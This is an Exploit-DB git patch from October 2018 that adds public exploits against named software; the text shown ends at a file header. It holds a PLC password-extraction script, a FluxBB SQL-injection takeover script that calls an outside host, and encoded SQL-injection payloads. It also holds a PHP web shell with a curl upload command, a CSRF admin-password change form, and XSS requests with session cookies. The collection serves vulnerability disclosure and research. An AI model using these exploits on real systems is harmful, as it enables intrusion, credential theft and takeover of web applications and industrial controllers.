From 9d143a6b42e2440aadcaebdcd5e432c953ae3cfc Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 13 Oct 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-10-13

22 changes to exploits/shellcodes

Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection
Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection
Wikidforum 2.20 - Cross-Site Scripting
WAGO 750-881 01.09.18 - Cross-Site Scripting
E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
Phoenix Contact WebVisit 6.40.00 - Password Disclosure
HaPe PKH 1.1 - 'id' SQL Injection
LUYA CMS 1.0.12 - Cross-Site Scripting
Phoenix Contact WebVisit 2985725 - Authentication Bypass
HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)
CAMALEON CMS 2.4 - Cross-Site Scripting
HaPe PKH 1.1 - Arbitrary File Upload
SugarCRM 6.5.26 - Cross-Site Scripting
FluxBB < 1.5.6 - SQL Injection
---
 exploits/hardware/webapps/45581.txt | 18 ++++++
 exploits/hardware/webapps/45586.py  | 75 +++++++++++++++++++++++
 exploits/multiple/webapps/45595.py  | 66 ++++++++++++++++++++
 exploits/php/webapps/40804.txt      |  2 +-
 exploits/php/webapps/40971.txt      |  2 +-
 exploits/php/webapps/41919.txt      |  2 +-
 exploits/php/webapps/41920.txt      |  2 +-
 exploits/php/webapps/41921.txt      |  2 +-
 exploits/php/webapps/41922.txt      |  2 +-
 exploits/php/webapps/45580.txt      | 28 +++++++++
 exploits/php/webapps/45582.txt      | 16 +++++
 exploits/php/webapps/45584.txt      | 17 ++++++
 exploits/php/webapps/45588.txt      | 52 ++++++++++++++++
 exploits/php/webapps/45589.txt      | 28 +++++++++
 exploits/php/webapps/45591.txt      | 55 +++++++++++++++++
 exploits/php/webapps/45592.txt      | 30 ++++++++++
 exploits/php/webapps/45593.txt      | 63 +++++++++++++++++++
 exploits/php/webapps/45594.txt      | 26 ++++++++
 exploits/windows/local/45583.txt    | 47 +++++++++++++++
 exploits/windows/local/45585.txt    | 56 +++++++++++++++++
 exploits/windows/local/45587.txt    | 45 ++++++++++++++
 exploits/windows/webapps/45590.py   | 93 +++++++++++++++++++++++++++++
 files_exploits.csv                  | 16 +++++
 23 files changed, 737 insertions(+), 6 deletions(-)
 create mode 100644 exploits/hardware/webapps/45581.txt
 create mode 100755 exploits/hardware/webapps/45586.py
 create mode 100755 exploits/multiple/webapps/45595.py
 create mode 100644 exploits/php/webapps/45580.txt
 create mode 100644 exploits/php/webapps/45582.txt
 create mode 100644 exploits/php/webapps/45584.txt
 create mode 100644 exploits/php/webapps/45588.txt
 create mode 100644 exploits/php/webapps/45589.txt
 create mode 100644 exploits/php/webapps/45591.txt
 create mode 100644 exploits/php/webapps/45592.txt
 create mode 100644 exploits/php/webapps/45593.txt
 create mode 100644 exploits/php/webapps/45594.txt
 create mode 100644 exploits/windows/local/45583.txt
 create mode 100644 exploits/windows/local/45585.txt
 create mode 100644 exploits/windows/local/45587.txt
 create mode 100755 exploits/windows/webapps/45590.py

diff --git a/exploits/hardware/webapps/45581.txt b/exploits/hardware/webapps/45581.txt
new file mode 100644
index 000000000..bc70ee56c
--- /dev/null
+++ b/exploits/hardware/webapps/45581.txt
@@ -0,0 +1,18 @@
+# Exploit Title: WAGO 750-881 01.09.18 - Cross-Site Scripting
+# Date: 2018-08-30
+# Exploit Author: SecuNinja (@secuninja)
+# Vendor Homepage: wago.com
+# Version: 01.09.18(13) and earlier
+# Affected Products: Ethernet Controller 750-881 - 01.09.18(13), 01.08.01 (10)
+# CVE : N/A
+
+# Description
+# WAGO 750-881 Ethernet Controller devices, versions 01.09.18(13) and before, 
+# have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi
+# SNMP_DESC or SNMP_LOC_SNMP_CONT field.
+
+# PoC
+# http://ip.address/webserv/cplcfg/snmp.ssi FORM fields SNMP_DESC, SNMP_LOC_SNMP_CONT
+# Exploit String "<svg/onload=alert(1)>
+# http-post-data:
+SNMP_DESC=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&SNMP_LOC%22%3E%3Csvg%2Fonload%3Dalert%282%29%3E&SNMP_CONT=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&SNMP_V1V2_ENABLE=SNMP_V1V2_ENABLE&SNMP1_LCOM_NAME=public&SNMP_TR_V1V2_1_IP=0.0.0.0&SNMP1_COM_NAME=public&SNMP_V1V2_TR1_VERSION=SNMP_V1V2_TR1_VERSION1&SNMP_TR_V1V2_2_IP=0.0.0.0&SNMP2_COM_NAME=public&SNMP_V1V2_TR2_VERSION=SNMP_V1V2_TR2_VERSION1&SUBMIT=SUBMIT
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45586.py b/exploits/hardware/webapps/45586.py
new file mode 100755
index 000000000..140266573
--- /dev/null
+++ b/exploits/hardware/webapps/45586.py
@@ -0,0 +1,75 @@
+# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure
+# Exploit Author: Deneut Tijl
+# Date: 2018-09-30
+# Vendor Homepage: www.phoenixcontact.com
+# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
+# Version: WebVisit < 6.40.00
+# CVE: CVE-2016-8366
+
+# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, 
+# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are 
+# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved
+		
+# Sample output:
+# C:\Users\admin\Desktop>CVE-2016-8366.py
+# Please enter an IP [192.168.1.200]:
+# This is the password for userlevel 1: pw1
+# This is the password for userlevel 2: SuperPass2
+# This is the password for userlevel 3: Extreme2TheMax3
+# This is the password for userlevel 4: PowerPass4
+# Press Enter to exit
+
+# PoC
+
+#! /usr/bin/env python
+
+import urllib2, binascii
+
+strIP = raw_input('Please enter an IP [192.168.1.200]: ')
+if strIP == '': strIP = '192.168.1.200'
+
+try:
+    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
+except urllib2.HTTPError:
+    print('#### Critical Error with IP ' + strIP + ': no response')
+    raw_input('Press Enter to exit')
+    exit()
+
+strMainTEQ = ''
+for line in URLResponse.readlines():
+    if 'MainTEQName' in line:
+        strMainTEQ = line.split('VALUE="')[1].split('"')[0]
+
+if strMainTEQ == '':
+    print('#### Error, no \'MainTEQ\' found on the main page')
+    raw_input('Press Enter to exit')
+    exit()
+
+try:
+    LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))
+except urllib2.HTTPError:
+    print('Critical Error with IP ' + strIP + ': File \'' + strMainTEQ + '\' not found')
+    raw_input('Press Enter to exit')
+    exit()
+strAlldata = ''
+for line in LoginTeqResponse.readlines():
+    strAlldata += binascii.hexlify(line)
+
+## For vulnerable webvisit:
+## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'
+## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'
+## For WebVisit > 6.40.00
+## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)
+
+arrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'
+for item in arrData:
+    if '00030003010301068300' in item:
+        intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1
+        strPassLength = item.split('00030003010301068300')[1][:2]
+        strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])
+        print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)
+    elif '0003000301030b06830040' in item:
+        intUserlevel = int(binascii.unhexlify(item[:2]), 16)
+        strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])
+        print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())
+raw_input('Press Enter to exit')
\ No newline at end of file
diff --git a/exploits/multiple/webapps/45595.py b/exploits/multiple/webapps/45595.py
new file mode 100755
index 000000000..f09daf2b4
--- /dev/null
+++ b/exploits/multiple/webapps/45595.py
@@ -0,0 +1,66 @@
+#!/usr/bin/env python
+# Friday, November 21, 2014 - secthrowaway () safe-mail net
+# FluxBB <= 1.5.6 SQL Injection
+# make sure that your IP is reachable
+
+url  = 'http://target.tld/forum/'
+user = 'user' # dummy account
+pwd  = 'test' 
+
+import urllib, sys, smtpd, asyncore, re, sha
+from email import message_from_string
+from urllib2 import Request, urlopen
+
+ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
+bindip = '0.0.0.0'
+
+def stage1(sql):
+	if len(sql) > 80:
+		sys.exit('SQL too long, max 80 chars')
+	print "1st stage: %s (%d chars)" % (sql, len(sql))
+	r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid), data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd), headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read()
+	if 'An email has been sent to the specified address' not in r:
+		sys.exit('err')
+
+def stage3(key):
+	print "3rd stage, using key: %s" % key
+	r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key), headers={"User-agent": ua})).read()
+	if 'Your password has been updated' in r:
+		print 'success'
+	else:
+		print 'err'
+
+class stage2_smtp(smtpd.SMTPServer):
+	def process_message(self, peer, mailfrom, rcpttos, data):
+		print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
+		key = re.search("(https?://.*&key=([^\s]+))", message_from_string(data).get_payload(decode=True), re.MULTILINE)
+		if key is not None: 
+			raise asyncore.ExitNow(key.group(2))
+		return
+
+def login():
+	print "logging in"
+	r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd), headers={"User-agent": ua}))
+	try:
+		t = r.info()['set-cookie'].split(';')[0]
+		return (t.split('=')[1].split('%7C')[0], t)
+	except:
+		sys.exit('unable to login, check user/pass')
+
+uid, cookie = login()
+
+email_domain = urlopen(Request('http://tns.re/gen')).read()
+print "using domain: %s" % email_domain
+
+#this will change your password to your password :)
+stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))
+
+#this will change admin's (uid=2) password "123456"
+#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))
+
+try:
+	print "2nd stage: waiting for mail"
+	server = stage2_smtp((bindip, 25), None)
+	asyncore.loop()
+except asyncore.ExitNow, key:
+	stage3(key)
\ No newline at end of file
diff --git a/exploits/php/webapps/40804.txt b/exploits/php/webapps/40804.txt
index 60a4e4bbd..4e24f9bd7 100644
--- a/exploits/php/webapps/40804.txt
+++ b/exploits/php/webapps/40804.txt
@@ -3,7 +3,7 @@
 # Exploit Author: TAD GROUP
 # Vendor Homepage: https://wordpress.org/plugins/olimometer/
 # Software Link: https://wordpress.org/plugins/olimometer/
-# Contact: info@tad.group
+# Contact: info[at]tad.group
 # Website: https://tad.group
 # Category: Web Application Exploits
 # Tested on: Debian 8
diff --git a/exploits/php/webapps/40971.txt b/exploits/php/webapps/40971.txt
index f8384c378..5b2f30039 100644
--- a/exploits/php/webapps/40971.txt
+++ b/exploits/php/webapps/40971.txt
@@ -3,7 +3,7 @@
 # Exploit Author: TAD GROUP
 # Vendor Homepage: https://wordpress.org/plugins/simply-poll/
 # Software Link: https://wordpress.org/plugins/simply-poll/
-# Contact: info@tad.group
+# Contact: info[at]tad.group
 # Website: https://tad.group
 # Category: Web Application Exploits
 
diff --git a/exploits/php/webapps/41919.txt b/exploits/php/webapps/41919.txt
index 885d7784f..8976f6acb 100644
--- a/exploits/php/webapps/41919.txt
+++ b/exploits/php/webapps/41919.txt
@@ -4,7 +4,7 @@
 # Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
 # Software Link: https://wordpress.org/plugins-wp/kittycatfish/
 # Version: 2.2
-# Contact: info@tad.group
+# Contact: info[at]tad.group
 # Website: https://tad.group
 # Category: Web Application Exploits
 
diff --git a/exploits/php/webapps/41920.txt b/exploits/php/webapps/41920.txt
index 6c1690908..0103dbb33 100644
--- a/exploits/php/webapps/41920.txt
+++ b/exploits/php/webapps/41920.txt
@@ -4,7 +4,7 @@
 # Vendor Homepage: https://www.bestsoftinc.com/
 # Software Link: https://www.bestsoftinc.com/car-rental-system.html
 # Version: 2.5
-# Contact: info@tad.group
+# Contact: info[at]tad.group
 # Website: https://tad.group
 # Category: Web Application Exploits
 
diff --git a/exploits/php/webapps/41921.txt b/exploits/php/webapps/41921.txt
index f63dfe57f..610ef48fa 100644
--- a/exploits/php/webapps/41921.txt
+++ b/exploits/php/webapps/41921.txt
@@ -4,7 +4,7 @@
 # Vendor Homepage: http://wow-company.com/
 # Software Link: https://wordpress.org/plugins/mwp-viral-signup/
 # Version: 2.1
-# Contact: info@tad.group
+# Contact: info[at]tad.group
 # Website: https://tad.group
 # Category: Web Application Exploits
 
diff --git a/exploits/php/webapps/41922.txt b/exploits/php/webapps/41922.txt
index 674badc48..825c57292 100644
--- a/exploits/php/webapps/41922.txt
+++ b/exploits/php/webapps/41922.txt
@@ -4,7 +4,7 @@
 # Vendor Homepage: http://wow-company.com/
 # Software Link: https://wordpress.org/plugins/mwp-forms/
 # Version: 2.1
-# Contact: info@tad.group
+# Contact: info[at]tad.group
 # Website: https://tad.group
 # Category: Web Application Exploits
 
diff --git a/exploits/php/webapps/45580.txt b/exploits/php/webapps/45580.txt
new file mode 100644
index 000000000..d6b227fcb
--- /dev/null
+++ b/exploits/php/webapps/45580.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Wikidforum 2.20 - Cross-Site Scripting
+# Date: 2018-10-10
+# Exploit Author: Amir Hossein Mahboubi
+# Vendor Homepage: https://sourceforge.net/projects/wikidforum/
+# Software Link: https://sourceforge.net/projects/wikidforum/files/Wikidforum-com-ed.2.20.zip/download
+# Version: <=2.20(Latest)
+# Tested on: Linux & Windows
+
+# Vulnerable POST parameter: reply_text
+# HTTP Requests for injecting XSS as post comment:
+# Pre condition: A loged in user can post comment, signup is possible for everyone
+
+POST /test/exploit-db/wikidforum/rpc.php HTTP/1.1
+Host: localhost:85
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: application/json, text/javascript, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:85/test/exploit-db/wikidforum/faq_1/forum-setup_8/requirements-for-installing-wikidforum_2.html
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 250
+Cookie: PHPSESSID=5cnpc1euun68t8st3c9p1dsal5
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+  
+action=applications/post/rpc.php&mode=submit_reply&title=Re: Requirements for installing WikidForum&parent_post_id=2&category_id=8&last_order_id=1&reply_text=<p><img src="/test/exploit-db/wikidforum/uploads/amir.jpg" onerror="alert(1)" alt="6" /></p>
\ No newline at end of file
diff --git a/exploits/php/webapps/45582.txt b/exploits/php/webapps/45582.txt
new file mode 100644
index 000000000..c2df86cf2
--- /dev/null
+++ b/exploits/php/webapps/45582.txt
@@ -0,0 +1,16 @@
+# Exploit Title: E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection
+# Exploit Author: Ihsan Sencan
+# Dork: N/A
+# Date: 2018-10-11
+# Vendor Homepage: https://sourceforge.net/projects/eregistrasi-kejuaraan-silat/
+# Software Link: https://sourceforge.net/projects/eregistrasi-kejuaraan-silat/files/latest/download
+# Version: 18.10
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/nilai/monitor_nilai.php?id_partai=[SQL]
+ 
+%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%20%2c%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%61%64%6d%69%6e%29%57%48%45%52%45%28%40%78%29%49%4e%28%40%78%3a%3d%43%4f%4e%43%41%54%28%30%78%32%30%2c%40%78%2c%30%78%35%35%37%33%36%35%37%32%32%30%34%39%34%34%33%61%2c%75%73%65%72%49%64%2c%30%78%33%63%36%32%37%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%36%65%36%31%36%64%36%35%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%29%2d%2d
\ No newline at end of file
diff --git a/exploits/php/webapps/45584.txt b/exploits/php/webapps/45584.txt
new file mode 100644
index 000000000..9c3bb6d0f
--- /dev/null
+++ b/exploits/php/webapps/45584.txt
@@ -0,0 +1,17 @@
+# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
+# Author: Larry W. Cashdollar, @_larry0
+# Date: 2018-10-09
+# Vendor: https://github.com/blueimp
+# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
+# CVE-ID: N/A
+
+# Vulnerability:
+# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php 
+# doesn't require any validation to upload files to the server.  It also doesn't exclude file types.  
+# This allows for remote code execution.
+
+# shell.php:
+<?php $cmd=$_GET['cmd']; system($cmd);?>
+
+# Exploit Code:
+$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
\ No newline at end of file
diff --git a/exploits/php/webapps/45588.txt b/exploits/php/webapps/45588.txt
new file mode 100644
index 000000000..c09942554
--- /dev/null
+++ b/exploits/php/webapps/45588.txt
@@ -0,0 +1,52 @@
+# Exploit Title: HaPe PKH 1.1 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.sitejo.id
+# Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# # 1) Everyone
+# POST http://localhost/[PATH]/lap-anggota-kelompok-pdf.php HTTP/1.1
+
+nama_kelompok=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
+ 
+# 2) Everyone
+# POST http://localhost/hape-pkh/lap-peserta-perdesa-pdf.php
+
+desa=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
+
+# 3) Everyone
+# http://localhost/[PATH]/admin/media.php?module=desa&act=hapus&id=[SQL]
+
+%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
+
+# 4) Users
+# http://localhost/[PATH]/admin/media.php?module=pengurus&act=print&id=[SQL]
+
+%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
+ 
+# 5) Users
+# http://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL]
+
+&id=%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
+ 
+# 6) Users
+# http://localhost/[PATH]/admin/media.php?module=fasilitas&act=editfasilitas&id=[SQL]
+
+%2d%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%53%59%53%54%45%4d%5f%55%53%45%52%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d
+ 
+# 7) Users
+# http://localhost/[PATH]/admin/media.php?module=kelompok&act=editkelompok&id=[SQL]
+
+%2d%31%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2d%2d%20%2d
+ 
+# 8) Everyone
+# Delete Item *
+
+http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=hapus&id=[ID]
+http://localhost/[PATH]/admin/modul/mod_update/aksi_update.php?module=update&act=hapus&id=[ID]
\ No newline at end of file
diff --git a/exploits/php/webapps/45589.txt b/exploits/php/webapps/45589.txt
new file mode 100644
index 000000000..7e927f43f
--- /dev/null
+++ b/exploits/php/webapps/45589.txt
@@ -0,0 +1,28 @@
+# Exploit Title: LUYA CMS 1.0.12 - Cross-Site Scripting
+# Date: 2018-10-11 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://luya.io/
+# Software Link : https://github.com/luyadev/luya/
+# Software : LUYA CMS
+# Version : 1.0.12
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+# HTTP POST Request :
+ 
+POST /admin/api-cms-nav/create-page HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: application/json, text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://TARGET/en/admin
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Authorization: Bearer 53431c6c5c751d6655966396667a70cbf483bc2869ce1b45cecb5be8983d6fa08o5E7gSdThq_KprALbv_-r496se-lhLi
+X-CSRF-Token: vHqCboMdLTmKiufTdIrCcdmFAhmahRSLihW4CuJKQprpGNID4nZPd8njkYkO7Igpi-RFKfDgf8LTcOp4mhB34A==
+Content-Length: 295
+Cookie: _pk_id.1.2c3a=0f1464d36bad1760.1539204750.1.1539204750.1539204750.; _pk_ref.1.2c3a=%5B%22%22%2C%22%22%2C1539204750%2C%22https%3A%2F%2Fwww.google.com%2F%22%5D; PHPSESSID=pm9625erik3t3ddkqmql8nb0u1; _csrf_admin=b5e1f46c449881bd2d16dd32fcd2d2e02579c1a19bc7e233396e4bac99665c23a%3A2%3A%7Bi%3A0%3Bs%3A11%3A%22_csrf_admin%22%3Bi%3A1%3Bs%3A32%3A%22DxmjAB6ItiORW07BdnHjOXGhutdrmcx_%22%3B%7D
+Connection: close
+
+isInline=false&nav_item_type=1&parent_nav_id=0&is_draft=0&nav_container_id=1&lang_id=1&use_draft=0&layout_id=2&from_draft_id=0&title=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E&alias=url-address-test&description=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/45591.txt b/exploits/php/webapps/45591.txt
new file mode 100644
index 000000000..656e82442
--- /dev/null
+++ b/exploits/php/webapps/45591.txt
@@ -0,0 +1,55 @@
+# Exploit Title: HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)
+# Dork: N/A
+# Date: 2018-10-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.sitejo.id
+# Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download
+# Version: 1.1 
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Description
+# The administrator password can be changed.
+
+POST /hape-pkh/admin/modul/mod_user/aksi_user.php?module=user&act=update HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------265001916915724
+Content-Length: 350
+Cookie: PHPSESSID=0msajnig4du85odc3hanq1dil2
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------265001916915724
+Content-Disposition: form-data; name="id_user"
+1
+-----------------------------265001916915724
+Content-Disposition: form-data; name="password"
+efe
+-----------------------------265001916915724
+Content-Disposition: form-data; name="level"
+admin
+-----------------------------265001916915724--
+
+/* `exploitdb`.`admin` */
+$admin = array(
+  array('id_user' => '1','nama_lengkap' => '','jk' => '','tempat' => '','tl' => '0000-00-00','alamat' => '','id_desa' => '','no_telp' => '','email' => '','username' => 'admin','password' => '5ebf8364d17c8df7e4afd586c24f84a0','level' => 'admin','blokir' => '','foto' => '76dsc00404.jpg')
+);
+efe = 5ebf8364d17c8df7e4afd586c24f84a0
+
+# PoC:
+# 2)
+
+<form method="POST" enctype="multipart/form-data" action="http://localhost/hape-pkh/admin/modul/mod_user/aksi_user.php?module=user&act=update">
+<input name="id_user" value="1" type="hidden">
+<input name="username" value="admin" disabled=""> 
+<input class="input3" size="30" name="password" type="text" value="efe">
+<input name="level" value="admin" checked="" type="radio">
+<input value="Update" type="submit">
+</form>
\ No newline at end of file
diff --git a/exploits/php/webapps/45592.txt b/exploits/php/webapps/45592.txt
new file mode 100644
index 000000000..7f82d2fa6
--- /dev/null
+++ b/exploits/php/webapps/45592.txt
@@ -0,0 +1,30 @@
+# Exploit Title: CAMALEON CMS 2.4 - Cross-Site Scripting
+# Date: 2018-10-11 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: http://camaleon.tuzitio.com/
+# Software Link : https://github.com/owen2345/camaleon-cms
+# Software : CAMALEON CMS
+# Version : 2.4
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+ 
+# HTTP POST Request :
+ 
+POST /admin/media/upload?actions=false HTTP/1.1
+Host: demo-7728.tuzitio.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://demo-7728.tuzitio.com/admin/profile/edit
+X-CSRF-Token: D4mT8cg18Rxhpi7fYr9kRRvdCn2dSZXJMbbFeyOynVVMa3aD1pbIXDebhV3B2YwRttvYyoRLRWNf5gGlqX6fNw==
+X-Requested-With: XMLHttpRequest
+Content-Length: 1575324
+Content-Type: multipart/form-data; boundary=---------------------------85707368319206533892056530265
+Cookie: _ga=GA1.2.1784268591.1539231194; _gid=GA1.2.1333106602.1539231194; _tuzitio2_session=RHhIbzhHZTlERjFnM3ZUOTFzMnE5c295TCtVQ0QrUmttVGpCZnljaS9ibVM4UE9Ma0VDR2ppcnQzdlNPZFNobUsxdFhNSER4Z3JXYlBxN3VZcTNEbWRXS0ZldERyLzYyQ3d0S3hwSjhzWjBUMHJmaU1WeEt6MDB2QlQ0S0xkbGhUdkNwUHIrRS81ekJ3T2NnOUdnVXB5KzhPS1BnczNvaUtia2x6bmE3N2pzckRPaWI2Skc1RGhJWnZMbERRREZCSXpkU3pxdTMrRlk5WG5XYUMydk9xb1NRY2lzeWt2TWpwVjNodXJNOHFDZG9yczZXVkFMMXU2KzBZSTVqUGNkcDdjV3dBbmFuOVF3Z3BRRlFLcjFtcjVhK3hpak51VUFScVg3czQ0Z2xoOTg9LS1rczBEeWJsaDJPRkhwaTU3UHFSa2h3PT0%3D--f896a698dc0ad774de6bc953d2b9e460e916300f; auth_token=2ysW1sleUvjMJnzIqwlXag&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0&176.41.2.45
+Connection: close
+
+-----------------------------85707368319206533892056530265
+Content-Disposition: form-data; name="file_upload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
+Content-Type: image/jpeg
\ No newline at end of file
diff --git a/exploits/php/webapps/45593.txt b/exploits/php/webapps/45593.txt
new file mode 100644
index 000000000..6df40eba1
--- /dev/null
